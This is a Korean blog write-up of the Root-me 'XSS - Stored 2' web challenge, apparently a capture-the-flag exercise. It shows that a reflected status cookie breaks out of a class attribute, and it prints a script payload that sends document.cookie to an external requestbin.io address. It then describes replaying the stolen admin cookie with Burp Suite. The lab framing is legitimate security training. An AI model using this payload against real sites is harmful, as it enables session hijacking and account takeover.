-
XSS - Stored 2Wargame/Root-me = Web - Client 2022. 11. 9. 20:29
문제 설명을 살펴보면
관리자 세션 쿠키를 탈취하여 관리자 구역에 접근하라 한다.
우선 Message에 스크립트 문을 입력해보면
실행되지 않는다.
아래 부분에 Message 입력값이 그대로 출력되는 것으로 보아 단순히 문자열로 받는 것 같다.
쿠키 값을 한 번 살펴보면
status 쿠키에 invite라는 값을 가지고 있다.
invite를 admin으로 변경해보면
우측 상단의 Status와 아래 부분 status가 admin으로 바뀐 것을 확인할 수 있다.
status 쿠키의 값을 스크립트문으로 해 보면
실행이 되지 않는다.
저 부분의 소스코드를 살펴보면
class에도 똑같이 들어가는 것을 볼 수 있다.
따라서, ">로 닫아주고 해보면
class가 닫히고 스크립트 문이 실행되게 된다.
이를 이용하여 관리자의 쿠키를 탈취하면 된다.
"><script>document.write('<img src=\"http://requestbin.io/155onho1?cookie='+document.cookie+'\"')</script>
Burp Suiter를 이용해 위와 같이 쿠키 값을 설정하여 보내면
관리자의 쿠키를 획득할 수 있다.
그리고 관리자의 구역에 접근하라 했으니, 페이지 좌측 상단의 admin으로 접근할 때
Burp Suite를 이용해 쿠키의 값을 아래와 같이 주게 되면
flag를 획득할 수 있다.
'Wargame > Root-me = Web - Client' 카테고리의 다른 글
XSS DOM Based - Filters Bypass (0) 2022.11.14 XSS DOM Based - Introduction (0) 2022.11.08 <Root-me> Install files (0) 2022.01.05 <Root-me> XSS - Stored 1 (0) 2022.01.04 <Root-me> CSRF - 0 protection (0) 2021.12.24